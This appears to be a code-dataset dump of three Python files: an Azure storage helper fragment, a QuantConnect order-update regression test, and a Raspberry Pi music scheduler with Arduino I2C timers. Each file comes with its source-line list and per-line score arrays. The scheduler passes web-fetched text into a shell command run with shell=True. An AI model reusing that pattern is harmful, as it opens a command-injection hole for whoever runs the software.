"\n", "def get_table_details(subscription_id, creds, resource_group_name, account_name, table_name, next_partition_key=None, next_row_key=None):\n", " keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name)\n", " table_service = TableService(account_name, keys.key1)\n", "\n", " model = StorageAccountTableDetails()\n", " model.table_name = table_name\n", " model.entities = table_service.query_entities(\n", " table_name,\n", " top=3, # small to demonstrate continuations\n", " next_partition_key=next_partition_key,\n", " next_row_key=next_row_key,\n", " )\n", " model.custom_fields = _get_entities_custom_fields(model.entities)\n", "\n", " return model\n", "\n", "def 
_get_entities_custom_fields(entities):\n", " '''Get the union of all custom fields in the specified entities.'''\n", " custom_fields = set()\n", " for entity in entities:\n", " fields = dir(entity)\n", " for field in fields:\n", " if not field.startswith('_'):\n", " custom_fields.add(field)\n", " for skip_field in ['PartitionKey', 'RowKey', 'Timestamp', 'etag']:\n", " custom_fields.discard(skip_field)\n", " return custom_fields\n", "\n", "def unregister_provider(subscription_id, creds, provider_namespace):\n", " resource_client = ResourceManagementClient(creds, subscription_id)\n", " resource_client.providers.unregister(provider_namespace)\n", "\n", "def register_provider(subscription_id, creds, provider_namespace):\n", " resource_client = ResourceManagementClient(creds, subscription_id)\n", " resource_client.providers.register(provider_namespace)\n", "\n", "def create_storage_account(subscription_id, creds, resource_group_name, account_name, location, type):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " result = storage_client.storage_accounts.create(\n", " resource_group_name,\n", " account_name,\n", " StorageAccountCreateParameters(\n", " location=location,\n", " account_type=type,\n", " ),\n", " raw=True\n", " )\n", " return result.response\n", "\n", "def delete_storage_account(subscription_id, creds, resource_group_name, account_name):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " result = storage_client.storage_accounts.delete(\n", " resource_group_name,\n", " account_name,\n", " )\n", " return result\n", "\n", "def get_create_storage_account_status(subscription_id, creds, link):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " request = storage_client._client.get(link)\n", " result = storage_client._client.send(request)\n", " return result\n" ]
[ 0.013333333333333334, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0.027777777777777776, 0, 0, 0, 0, 0, 0, 0, 0, 0.02702702702702703, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0, 0, 0.023809523809523808, 0, 0, 0, 0, 0, 0.023809523809523808, 0, 0, 0, 0, 0, 0.04, 0, 0, 0, 0, 0.02702702702702703, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.018518518518518517, 0, 0, 0, 0, 0, 0, 0, 0, 0.012987012987012988, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0.01, 0, 0, 0, 0, 0.010101010101010102, 0.010752688172043012, 0, 0, 0, 0.013513513513513514, 0, 0, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0, 0.011363636363636364, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0.02, 0, 0, 0, 0.012195121951219513, 0.012195121951219513, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0, 0, 0.0196078431372549, 0.010416666666666666, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0.009009009009009009, 0.01020408163265306, 0, 0, 0, 0, 0, 0, 0, 0.023255813953488372, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02127659574468085, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0.014492753623188406, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0, 0, 0, 0, 0.023255813953488372, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.014492753623188406, 0, 0, 0, 0.014925373134328358, 0, 0, 0, 0.019417475728155338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022988505747126436, 0, 0, 0, 0, 0, 0, 0, 0.014492753623188406, 0, 0, 0, 0 ]
320
0.00255
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System.Core") AddReference("System.Collections") AddReference("QuantConnect.Algorithm") AddReference("QuantConnect.Common") from System import * from System.Linq import * from QuantConnect import * from QuantConnect.Algorithm import * from QuantConnect.Data import * from QuantConnect.Orders import * from QuantConnect.Securities import * from QuantConnect.Util import * from math import copysign from datetime import datetime ### <summary> ### Provides a regression baseline focused on updating orders ### </summary> ### <meta name="tag" content="regression test" /> class UpdateOrderRegressionAlgorithm(QCAlgorithm): def Initialize(self): '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. 
All algorithms must initialized.''' self.SetStartDate(2013,1,1) #Set Start Date self.SetEndDate(2015,1,1) #Set End Date self.SetCash(100000) #Set Strategy Cash # Find more symbols here: http://quantconnect.com/data self.security = self.AddEquity("SPY", Resolution.Daily) self.last_month = -1 self.quantity = 100 self.delta_quantity = 10 self.stop_percentage = 0.025 self.stop_percentage_delta = 0.005 self.limit_percentage = 0.025 self.limit_percentage_delta = 0.005 OrderTypeEnum = [OrderType.Market, OrderType.Limit, OrderType.StopMarket, OrderType.StopLimit, OrderType.MarketOnOpen, OrderType.MarketOnClose] self.order_types_queue = CircularQueue[OrderType](OrderTypeEnum) self.order_types_queue.CircleCompleted += self.onCircleCompleted self.tickets = [] def onCircleCompleted(self, sender, event): '''Flip our signs when we've gone through all the order types''' self.quantity *= -1 def OnData(self, data): '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.''' if not data.ContainsKey("SPY"): return if self.Time.month != self.last_month: # we'll submit the next type of order from the queue orderType = self.order_types_queue.Dequeue() #Log("") self.Log("\r\n--------------MONTH: {0}:: {1}\r\n".format(self.Time.strftime("%B"), orderType)) #Log("") self.last_month = self.Time.month self.Log("ORDER TYPE:: {0}".format(orderType)) isLong = self.quantity > 0 stopPrice = (1 + self.stop_percentage)*data["SPY"].High if isLong else (1 - self.stop_percentage)*data["SPY"].Low limitPrice = (1 - self.limit_percentage)*stopPrice if isLong else (1 + self.limit_percentage)*stopPrice if orderType == OrderType.Limit: limitPrice = (1 + self.limit_percentage)*data["SPY"].High if not isLong else (1 - self.limit_percentage)*data["SPY"].Low request = SubmitOrderRequest(orderType, self.security.Symbol.SecurityType, "SPY", self.quantity, stopPrice, limitPrice, self.UtcTime, str(orderType)) ticket = self.Transactions.AddOrder(request) 
self.tickets.append(ticket) elif len(self.tickets) > 0: ticket = self.tickets[-1] if self.Time.day > 8 and self.Time.day < 14: if len(ticket.UpdateRequests) == 0 and ticket.Status is not OrderStatus.Filled: self.Log("TICKET:: {0}".format(ticket)) updateOrderFields = UpdateOrderFields() updateOrderFields.Quantity = ticket.Quantity + copysign(self.delta_quantity, self.quantity) updateOrderFields.Tag = "Change quantity: {0}".format(self.Time.day) ticket.Update(updateOrderFields) elif self.Time.day > 13 and self.Time.day < 20: if len(ticket.UpdateRequests) == 1 and ticket.Status is not OrderStatus.Filled: self.Log("TICKET:: {0}".format(ticket)) updateOrderFields = UpdateOrderFields() updateOrderFields.LimitPrice = self.security.Price*(1 - copysign(self.limit_percentage_delta, ticket.Quantity)) updateOrderFields.StopPrice = self.security.Price*(1 + copysign(self.stop_percentage_delta, ticket.Quantity)) updateOrderFields.Tag = "Change prices: {0}".format(self.Time.day) ticket.Update(updateOrderFields) else: if len(ticket.UpdateRequests) == 2 and ticket.Status is not OrderStatus.Filled: self.Log("TICKET:: {0}".format(ticket)) ticket.Cancel("{0} and is still open!".format(self.Time.day)) self.Log("CANCELLED:: {0}".format(ticket.CancelRequest)) def OnOrderEvent(self, orderEvent): order = self.Transactions.GetOrderById(orderEvent.OrderId) ticket = self.Transactions.GetOrderTicket(orderEvent.OrderId) #order cancelations update CanceledTime if order.Status == OrderStatus.Canceled and order.CanceledTime != orderEvent.UtcTime: raise ValueError("Expected canceled order CanceledTime to equal canceled order event time.") #fills update LastFillTime if (order.Status == OrderStatus.Filled or order.Status == OrderStatus.PartiallyFilled) and order.LastFillTime != orderEvent.UtcTime: raise ValueError("Expected filled order LastFillTime to equal fill order event time.") # check the ticket to see if the update was successfully processed if len([ur for ur in ticket.UpdateRequests if 
ur.Response is not None and ur.Response.IsSuccess]) > 0 and order.CreatedTime != self.UtcTime and order.LastUpdateTime is None: raise ValueError("Expected updated order LastUpdateTime to equal submitted update order event time") if orderEvent.Status == OrderStatus.Filled: self.Log("FILLED:: {0} FILL PRICE:: {1}".format(self.Transactions.GetOrderById(orderEvent.OrderId), orderEvent.FillPrice)) else: self.Log(orderEvent.ToString()) self.Log("TICKET:: {0}".format(ticket))
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System.Core\")\n", "AddReference(\"System.Collections\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "AddReference(\"QuantConnect.Common\")\n", "\n", "from System import *\n", "from System.Linq import *\n", "from QuantConnect import *\n", "from QuantConnect.Algorithm import *\n", "from QuantConnect.Data import *\n", "from QuantConnect.Orders import *\n", "from QuantConnect.Securities import *\n", "from QuantConnect.Util import *\n", "from math import copysign\n", "from datetime import datetime\n", "\n", "### <summary>\n", "### Provides a regression baseline focused on updating orders\n", "### </summary>\n", "### <meta name=\"tag\" content=\"regression test\" />\n", "class UpdateOrderRegressionAlgorithm(QCAlgorithm):\n", "\n", " def Initialize(self):\n", " '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. 
All algorithms must initialized.'''\n", "\n", " self.SetStartDate(2013,1,1) #Set Start Date\n", " self.SetEndDate(2015,1,1) #Set End Date\n", " self.SetCash(100000) #Set Strategy Cash\n", " # Find more symbols here: http://quantconnect.com/data\n", "\n", " self.security = self.AddEquity(\"SPY\", Resolution.Daily)\n", "\n", " self.last_month = -1\n", " self.quantity = 100\n", " self.delta_quantity = 10\n", "\n", " self.stop_percentage = 0.025\n", " self.stop_percentage_delta = 0.005\n", " self.limit_percentage = 0.025\n", " self.limit_percentage_delta = 0.005\n", "\n", " OrderTypeEnum = [OrderType.Market, OrderType.Limit, OrderType.StopMarket, OrderType.StopLimit, OrderType.MarketOnOpen, OrderType.MarketOnClose]\n", " self.order_types_queue = CircularQueue[OrderType](OrderTypeEnum)\n", " self.order_types_queue.CircleCompleted += self.onCircleCompleted\n", " self.tickets = []\n", "\n", "\n", " def onCircleCompleted(self, sender, event):\n", " '''Flip our signs when we've gone through all the order types'''\n", " self.quantity *= -1\n", "\n", "\n", " def OnData(self, data):\n", " '''OnData event is the primary entry point for your algorithm. 
Each new data point will be pumped in here.'''\n", " if not data.ContainsKey(\"SPY\"):\n", " return\n", "\n", " if self.Time.month != self.last_month:\n", " # we'll submit the next type of order from the queue\n", " orderType = self.order_types_queue.Dequeue()\n", " #Log(\"\")\n", " self.Log(\"\\r\\n--------------MONTH: {0}:: {1}\\r\\n\".format(self.Time.strftime(\"%B\"), orderType))\n", " #Log(\"\")\n", " self.last_month = self.Time.month\n", " self.Log(\"ORDER TYPE:: {0}\".format(orderType))\n", " isLong = self.quantity > 0\n", " stopPrice = (1 + self.stop_percentage)*data[\"SPY\"].High if isLong else (1 - self.stop_percentage)*data[\"SPY\"].Low\n", " limitPrice = (1 - self.limit_percentage)*stopPrice if isLong else (1 + self.limit_percentage)*stopPrice\n", "\n", " if orderType == OrderType.Limit:\n", " limitPrice = (1 + self.limit_percentage)*data[\"SPY\"].High if not isLong else (1 - self.limit_percentage)*data[\"SPY\"].Low\n", "\n", " request = SubmitOrderRequest(orderType, self.security.Symbol.SecurityType, \"SPY\", self.quantity, stopPrice, limitPrice, self.UtcTime, str(orderType))\n", " ticket = self.Transactions.AddOrder(request)\n", " self.tickets.append(ticket)\n", "\n", " elif len(self.tickets) > 0:\n", " ticket = self.tickets[-1]\n", "\n", " if self.Time.day > 8 and self.Time.day < 14:\n", " if len(ticket.UpdateRequests) == 0 and ticket.Status is not OrderStatus.Filled:\n", " self.Log(\"TICKET:: {0}\".format(ticket))\n", " updateOrderFields = UpdateOrderFields()\n", " updateOrderFields.Quantity = ticket.Quantity + copysign(self.delta_quantity, self.quantity)\n", " updateOrderFields.Tag = \"Change quantity: {0}\".format(self.Time.day)\n", " ticket.Update(updateOrderFields)\n", "\n", " elif self.Time.day > 13 and self.Time.day < 20:\n", " if len(ticket.UpdateRequests) == 1 and ticket.Status is not OrderStatus.Filled:\n", " self.Log(\"TICKET:: {0}\".format(ticket))\n", " updateOrderFields = UpdateOrderFields()\n", " updateOrderFields.LimitPrice = 
self.security.Price*(1 - copysign(self.limit_percentage_delta, ticket.Quantity))\n", " updateOrderFields.StopPrice = self.security.Price*(1 + copysign(self.stop_percentage_delta, ticket.Quantity))\n", " updateOrderFields.Tag = \"Change prices: {0}\".format(self.Time.day)\n", " ticket.Update(updateOrderFields)\n", " else:\n", " if len(ticket.UpdateRequests) == 2 and ticket.Status is not OrderStatus.Filled:\n", " self.Log(\"TICKET:: {0}\".format(ticket))\n", " ticket.Cancel(\"{0} and is still open!\".format(self.Time.day))\n", " self.Log(\"CANCELLED:: {0}\".format(ticket.CancelRequest))\n", "\n", "\n", " def OnOrderEvent(self, orderEvent):\n", " order = self.Transactions.GetOrderById(orderEvent.OrderId)\n", " ticket = self.Transactions.GetOrderTicket(orderEvent.OrderId)\n", "\n", " #order cancelations update CanceledTime\n", " if order.Status == OrderStatus.Canceled and order.CanceledTime != orderEvent.UtcTime:\n", " raise ValueError(\"Expected canceled order CanceledTime to equal canceled order event time.\")\n", "\n", " #fills update LastFillTime\n", " if (order.Status == OrderStatus.Filled or order.Status == OrderStatus.PartiallyFilled) and order.LastFillTime != orderEvent.UtcTime:\n", " raise ValueError(\"Expected filled order LastFillTime to equal fill order event time.\")\n", "\n", " # check the ticket to see if the update was successfully processed\n", " if len([ur for ur in ticket.UpdateRequests if ur.Response is not None and ur.Response.IsSuccess]) > 0 and order.CreatedTime != self.UtcTime and order.LastUpdateTime is None:\n", " raise ValueError(\"Expected updated order LastUpdateTime to equal submitted update order event time\")\n", "\n", " if orderEvent.Status == OrderStatus.Filled:\n", " self.Log(\"FILLED:: {0} FILL PRICE:: {1}\".format(self.Transactions.GetOrderById(orderEvent.OrderId), orderEvent.FillPrice))\n", " else:\n", " self.Log(orderEvent.ToString())\n", " self.Log(\"TICKET:: {0}\".format(ticket))" ]
[ 0, 0.012345679012345678, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.038461538461538464, 0.037037037037037035, 0.02702702702702703, 0.03125, 0.029411764705882353, 0.02631578947368421, 0.03125, 0.038461538461538464, 0.03333333333333333, 0, 0.07142857142857142, 0.016129032258064516, 0.06666666666666667, 0.02, 0.0196078431372549, 0, 0, 0.006578947368421052, 0, 0.05454545454545454, 0.05660377358490566, 0.017241379310344827, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.006578947368421052, 0, 0, 0, 0, 0, 0.020833333333333332, 0, 0, 0, 0, 0.03571428571428571, 0.00847457627118644, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.009345794392523364, 0.047619047619047616, 0, 0, 0, 0.007936507936507936, 0.008620689655172414, 0, 0, 0.0072992700729927005, 0, 0.006172839506172839, 0, 0, 0, 0, 0, 0, 0, 0.010416666666666666, 0, 0, 0.008928571428571428, 0.011235955056179775, 0, 0, 0, 0.010416666666666666, 0, 0, 0.007575757575757576, 0.007692307692307693, 0.011494252873563218, 0, 0, 0.010416666666666666, 0, 0.012195121951219513, 0, 0, 0, 0.025, 0, 0, 0, 0.020833333333333332, 0.010638297872340425, 0.009523809523809525, 0, 0.02857142857142857, 0.0070921985815602835, 0.010101010101010102, 0, 0, 0.005494505494505495, 0.008849557522123894, 0, 0, 0.007407407407407408, 0, 0, 0.0196078431372549 ]
137
0.008341
false
#!/usr/bin/python # -*- coding: utf-8 -*- import logging import smbus import time as timec import datetime from datetime import datetime as datetimec import json import urllib import pprint import sys import subprocess import requests import feedparser import ap_music_server_conf import ap_music class Yukkuri: def __init__(self): self.conf = ap_music_server_conf.MusicServerConfig().get_conf() return def send_cmmand(self,cmd): p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout_data, stderr_data = p.communicate() return stdout_data def speech(self,text): cmd = self.conf['speech_api'] % text logging.debug(cmd) self.send_cmmand(cmd) def dayofweek_info_speech(self): weekday = datetime.datetime.now().weekday() for d in self.conf['dayofweek_info']: if d == str(weekday): self.speech(self.conf['dayofweek_info'][d]) def wether_speech(self): url = 'http://weather.livedoor.com/forecast/webservice/json/v1' payload = { 'city' : self.conf['city_id'] } data = requests.get(url, params = payload).json() text="" try: title = data['title']+u'をお伝えします。' text = title for weather in data["forecasts"]: date = weather['date'] d = date.encode().split("-") text += str(int(d[1])) +u"月"+ str(int(d[2]))+ u'日、' + weather['dateLabel'] + u'は' + weather['telop'] + u'です。' d = data["forecasts"][0]['date'].encode().split("-") max = data["forecasts"][0]['temperature']['max']['celsius'] text += u'今日、'+str(int(d[1])) +u"月"+ str(int(d[2]))+ u'日、の最高気温は、%s 度です。' % max min = data["forecasts"][0]['temperature']['min']['celsius'] text += u'最低気温は、%s 度です。' % min except TypeError: print("No temp in data") self.speech(text) def rss_speech(self,rss_url): feed = feedparser.parse(rss_url) for e in feed.entries: self.speech( e.title ) def play_welcome_msg(self): self.speech(self.conf['welcome_msg']) class Schedule: def __init__(self,motion_obj,timer_obj): self.conf = ap_music_server_conf.MusicServerConfig().get_conf() envfile = open(self.conf['schedule_file_path'], 'r') 
self.data = json.load(envfile) envfile.close() self.timer = timer_obj self.motion = motion_obj self.yukkuri = Yukkuri() self.music = ap_music.ApMusic() return def check_ex(self,timing): if timing.get('excond')=='movement': #if movement is active: print("excond",self.motion.get_latest_status()) if self.motion.get_latest_status() > 2: return True return False #movement is not set return True def check_power_control(self,entry): if entry['status']=='done': return if entry['action']=='shutdown': logging.debug("**************************") logging.debug("*** shutdown RasPi now ***") logging.debug("**************************") self.timer.send_shutdown_request() entry['status']='done' return return def check_speech_control(self,entry): if entry['action'] == "speech": self.yukkuri.speech(entry['content']) elif entry['action'] == "speech_weather": self.yukkuri.wether_speech() return def check_music_control(self,entry): if entry['action'] == "play": self.music.play_item(entry['content']) elif entry['action'] == "stop": self.music.stop() return def check_basic_timer(self,timing,now,target): t1 = ArduinoTimer.datetime_to_epoch(now) t2 = ArduinoTimer.datetime_to_epoch(target) if t1 > t2: if abs(t1-t2) < 60*1: #allow 60sec diff return self.check_ex(timing) else: if timing.get('excond')=='movement' and abs(t1-t2) < 60*60*3: return False return "done" return False def judge_timing(self,timing): now = datetime.datetime.now() day = now.weekday() if (timing['type']=='weekday' and day in {0,1,2,3,4}) \ or (timing['type']=='weekend' and day in {5,6}) \ or (timing['type']=='everyday'): hour,min = timing['value'].split(':') target = datetime.datetime(now.year,now.month,now.day,int(hour),int(min),0) return self.check_basic_timer(timing,now,target) elif timing['type']=='onshot': target = datetimec.strptime(timing['value'], '%Y/%m/%d %H:%M:%S') print("onshot",target) return self.check_basic_timer(timing,now,target) return False def check_entry(self,entry): if entry['status'] == 'done': 
return fire = self.judge_timing(entry['timing']) if fire == False: return elif fire == "done": entry['status'] = 'done' return if entry['type']=='power': #power control self.check_power_control(entry) elif entry['type']=='speech': #speech control self.check_speech_control(entry) elif entry['type']=='music': #speech control self.check_music_control(entry) entry['status'] = 'done' def update(self): for entry in self.data: self.check_entry(self.data[entry]) return def get_wakeup_timer_request(self): requests=[] for entry in self.data: d = self.data[entry] if d['action'] =='wakeup' and d['type']=='power': requests.append(d['timing']['value'].split(":")) return requests class ArduinoTimer(): ARDUINO_I2C_ADDR=0x10 CMD_SET_WAKUP_TIMER01A = 0x11 CMD_SET_WAKUP_TIMER01B = 0x12 CMD_SET_WAKUP_TIMER02A = 0x21 CMD_SET_WAKUP_TIMER02B = 0x22 CMD_CLEAR_TIMER = 0x40 CMD_SHUTDOWN_NOW = 0xFF def __init__(self,motion_obj): self.conf = ap_music_server_conf.MusicServerConfig().get_conf() self.i2c = smbus.SMBus(1) self.first_setting = False self.motion = motion_obj self.schedule = Schedule(self.motion,self) return @classmethod def datetime_to_epoch(self,d): return int(timec.mktime(d.timetuple())) @classmethod def epoch_to_datetime(self,epoch): return datetime(*timec.localtime(epoch)[:6]) def send_i2c_command(self,cmd,data): for num in range(1,5): try: self.i2c.write_block_data(self.ARDUINO_I2C_ADDR,cmd,data) except IOError: logging.debug("I2C IOerror in timer in Arduino communication > Retry") timec.sleep(num) else: logging.debug("I2C send OK to Arduino") return True return Flase def set_timer(self,time): target = self.datetime_to_epoch(time) diff = target - int(timec.time()) data1=[0,0] data2=[0,0] data1[0] = int((diff & 0xFF000000)>>24) data1[1] = (diff & 0x00FF0000)>>16 data2[0] = (diff & 0x0000FF00)>>8 data2[1] = diff & 0x000000FF if diff<0: return cmd = self.CMD_SET_WAKUP_TIMER01A logging.debug("cmd="+str(cmd)+" diff="+str(diff)) logging.debug(data1) self.send_i2c_command(cmd,data1) 
timec.sleep(0.05) cmd = self.CMD_SET_WAKUP_TIMER01B logging.debug("cmd="+str(cmd)+" diff="+str(diff)) logging.debug(data2) self.send_i2c_command(cmd,data2) return def set_cmd(self,cmd,time): data=[0,0] logging.debug("cmd="+str(cmd)) self.send_i2c_command(cmd,data) return def send_shutdown_request(self): logging.debug('send_shutdown_request') self.set_cmd(self.CMD_SHUTDOWN_NOW,datetime.datetime.now()) return def send_cleartimer_request(self): logging.debug('send_cleartimer_request') self.set_cmd(self.CMD_CLEAR_TIMER,datetime.datetime.now()) return def get_time(self,hour,min): now = datetime.datetime.now() tomorrow = now + datetime.timedelta(days=1) t = datetime.datetime(now.year,now.month,now.day,hour,min,0) if t < now: t = datetime.datetime(tomorrow.year,tomorrow.month,tomorrow.day,hour,min,0) return t def set_timer_once(self): if self.first_setting: return self.send_cleartimer_request() logging.debug("set wake up timer") requests = self.schedule.get_wakeup_timer_request() for req in requests: t1 = self.get_time(int(req[0]),int(req[1])) logging.debug(t1) self.set_timer(t1) self.first_setting = True return def check_event(self): mov_act = self.motion.get_latest_status() self.schedule.update() return def reload_schedule(self): logging.debug("reload_schedule") self.schedule = Schedule(self.motion,self) self.first_setting=False self.set_timer_once() def p(self): print("testestet")
[ "#!/usr/bin/python\n", "# -*- coding: utf-8 -*-\n", "\n", "import logging\n", "import smbus\n", "import time as timec\n", "import datetime\n", "from datetime import datetime as datetimec\n", "import json\n", "import urllib\n", "import pprint\n", "import sys\n", "import subprocess\n", "import requests\n", "import feedparser\n", "\n", "import ap_music_server_conf\n", "import ap_music\n", "\n", "class Yukkuri:\n", "\tdef __init__(self):\n", "\t\tself.conf = ap_music_server_conf.MusicServerConfig().get_conf()\n", "\t\treturn\n", "\n", "\tdef send_cmmand(self,cmd):\n", "\t\tp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n", "\t\tstdout_data, stderr_data = p.communicate()\n", "\t\treturn stdout_data\n", "\n", "\tdef speech(self,text):\n", "\t\tcmd = self.conf['speech_api'] % text\n", "\t\tlogging.debug(cmd)\n", "\t\tself.send_cmmand(cmd)\n", "\n", "\tdef dayofweek_info_speech(self):\n", "\t\tweekday = datetime.datetime.now().weekday()\n", "\t\tfor d in self.conf['dayofweek_info']:\n", "\t\t\tif d == str(weekday):\n", "\t\t\t\tself.speech(self.conf['dayofweek_info'][d])\n", "\n", "\tdef wether_speech(self):\n", "\t\turl = 'http://weather.livedoor.com/forecast/webservice/json/v1'\n", "\t\tpayload = { 'city' : self.conf['city_id'] }\n", "\t\tdata = requests.get(url, params = payload).json()\n", "\t\t\n", "\t\ttext=\"\"\n", "\t\ttry:\n", "\t\t\ttitle = data['title']+u'をお伝えします。'\n", "\t\t\n", "\t\t\ttext = title\n", "\t\t\tfor weather in data[\"forecasts\"]:\n", "\t\t\t\tdate = weather['date']\n", "\t\t\t\td = date.encode().split(\"-\")\n", "\t\t\t\ttext += str(int(d[1])) +u\"月\"+ str(int(d[2]))+ u'日、' + weather['dateLabel'] + u'は' + weather['telop'] + u'です。'\n", "\n", "\t\t\td = data[\"forecasts\"][0]['date'].encode().split(\"-\")\n", "\t\t\tmax = data[\"forecasts\"][0]['temperature']['max']['celsius']\n", "\t\t\ttext += u'今日、'+str(int(d[1])) +u\"月\"+ str(int(d[2]))+ u'日、の最高気温は、%s 度です。' % max\n", "\t\t\tmin = 
data[\"forecasts\"][0]['temperature']['min']['celsius']\n", "\t\t\ttext += u'最低気温は、%s 度です。' % min\n", "\t\texcept TypeError:\n", "\t\t\tprint(\"No temp in data\")\n", "\t\tself.speech(text)\n", "\n", "\tdef rss_speech(self,rss_url):\n", "\t\tfeed = feedparser.parse(rss_url)\n", "\t\tfor e in feed.entries:\n", "\t\t\tself.speech( e.title )\n", "\n", "\tdef play_welcome_msg(self):\n", "\t\tself.speech(self.conf['welcome_msg'])\n", "\n", "\n", "class Schedule:\n", "\tdef __init__(self,motion_obj,timer_obj):\n", "\t\tself.conf = ap_music_server_conf.MusicServerConfig().get_conf()\n", "\t\tenvfile = open(self.conf['schedule_file_path'], 'r')\n", "\t\tself.data = json.load(envfile)\n", "\t\tenvfile.close()\n", "\t\t\n", "\t\tself.timer = timer_obj\n", "\t\tself.motion = motion_obj\n", "\t\tself.yukkuri = Yukkuri()\n", "\t\tself.music = ap_music.ApMusic()\n", "\t\t\n", "\t\treturn\n", "\n", "\tdef check_ex(self,timing):\n", "\t\tif timing.get('excond')=='movement':\n", "\t\t\t#if movement is active:\n", "\t\t\tprint(\"excond\",self.motion.get_latest_status())\n", "\t\t\tif self.motion.get_latest_status() > 2:\n", "\t\t\t\treturn True\n", "\t\t\treturn False\n", "\t\t\t\n", "\t\t#movement is not set\n", "\t\treturn True\n", "\t\t\n", "\tdef check_power_control(self,entry):\n", "\t\tif entry['status']=='done':\n", "\t\t\treturn\n", "\t\tif entry['action']=='shutdown':\n", "\t\t\tlogging.debug(\"**************************\")\n", "\t\t\tlogging.debug(\"*** shutdown RasPi now ***\")\n", "\t\t\tlogging.debug(\"**************************\")\n", "\t\t\tself.timer.send_shutdown_request()\n", "\t\t\tentry['status']='done'\n", "\t\t\treturn\n", "\t\treturn\n", "\n", "\tdef check_speech_control(self,entry):\n", "\t\tif entry['action'] == \"speech\":\n", "\t\t\tself.yukkuri.speech(entry['content'])\n", "\t\telif entry['action'] == \"speech_weather\":\n", "\t\t\tself.yukkuri.wether_speech()\n", "\t\treturn\n", "\n", "\tdef check_music_control(self,entry):\n", "\t\tif entry['action'] == 
\"play\":\n", "\t\t\tself.music.play_item(entry['content'])\n", "\t\telif entry['action'] == \"stop\":\n", "\t\t\tself.music.stop()\n", "\t\treturn\n", "\n", "\tdef check_basic_timer(self,timing,now,target):\n", "\t\tt1 = ArduinoTimer.datetime_to_epoch(now)\n", "\t\tt2 = ArduinoTimer.datetime_to_epoch(target)\n", "\t\t\n", "\t\tif t1 > t2:\n", "\t\t\tif abs(t1-t2) < 60*1: #allow 60sec diff\n", "\t\t\t\treturn self.check_ex(timing)\n", "\t\t\telse:\n", "\t\t\t\tif timing.get('excond')=='movement' and abs(t1-t2) < 60*60*3:\n", "\t\t\t\t\treturn False\n", "\t\t\t\treturn \"done\"\n", "\t\treturn False\t\n", "\t\n", "\tdef judge_timing(self,timing):\n", "\t\tnow = datetime.datetime.now()\n", "\t\tday = now.weekday()\n", "\t\t\n", "\t\tif (timing['type']=='weekday' and day in {0,1,2,3,4}) \\\n", "\t\t or (timing['type']=='weekend' and day in {5,6}) \\\n", "\t\t or (timing['type']=='everyday'):\n", "\t\t\thour,min = timing['value'].split(':')\n", "\t\t\ttarget = datetime.datetime(now.year,now.month,now.day,int(hour),int(min),0)\n", "\t\t\treturn self.check_basic_timer(timing,now,target)\n", "\t\telif timing['type']=='onshot':\n", "\t\t\ttarget = datetimec.strptime(timing['value'], '%Y/%m/%d %H:%M:%S')\n", "\t\t\tprint(\"onshot\",target)\n", "\t\t\treturn self.check_basic_timer(timing,now,target)\n", "\t\treturn False\n", "\t\t\n", "\tdef check_entry(self,entry):\n", "\t\tif entry['status'] == 'done':\n", 